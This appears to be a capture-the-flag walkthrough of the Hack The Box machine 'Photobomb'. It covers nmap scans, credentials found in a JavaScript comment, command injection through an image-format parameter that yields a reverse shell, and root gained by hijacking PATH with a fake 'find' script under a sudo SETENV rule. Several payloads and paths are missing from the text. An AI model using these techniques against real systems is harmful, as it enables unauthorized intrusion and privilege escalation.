Skip to content



As usual a Nmap scan to know what we can do here:

└─$ sudo nmap --min-rate 1000 -p-
Starting Nmap 7.93 ( ) at 2022-11-29 10:54 CET
Nmap scan report for
Host is up (0.063s latency).
Not shown: 65533 closed tcp ports (reset)
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 42.14 seconds
└─$ sudo nmap -sC -sV -p 22,80   
Starting Nmap 7.93 ( ) at 2022-11-29 10:57 CET
Nmap scan report for
Host is up (0.055s latency).

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds

Only two ports, let's check that website. I can see that it is redirecting to photobomb.htb so I added it to my hosts file.

Port 80

Initial access

The site shows a really simple landing page and looks like there is another directory /printer that it is protected with a user and a password. Looking around I found this Javascript file:

// http://photobomb.htb/photobomb.js
function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
window.onload = init;

We have credentials now! pH0t0:b0Mb!.

RCE and reverse shell

The /printer directory allows the user to download different pictures with the quality and format that it selected. Playing a bit with the parameters I noticed that I was able to get code execution introducing the characters && at the end of the parameter used for the image format:

Testing the RCE vulnerability using the ping command and tcpdump

Using the next payload I was able to get a reverse shell as the user wizard:



To be honest this part was pretty easy, I found that our user is able to execute /opt/ as the root user and it can also specify environment variables:

wizard@photobomb:~$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/

Checking the script I quickly found that in the last line the find command is not using an absolute path:

. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

Since we are capable of injecting environment variables while executing the script with sudo, we can just create a script to execute a shell in our home directory called find and add our home directory to the PATH environment variable. This way, when we run the script with sudo, we will get a new shell as root once the script reaches the find command:

wizard@photobomb:~$ cat find 
#! /bin/bash

wizard@photobomb:~$ sudo PATH="/home/wizard:$PATH" /opt/
root@photobomb:/home/wizard/photobomb# id
uid=0(root) gid=0(root) groups=0(root)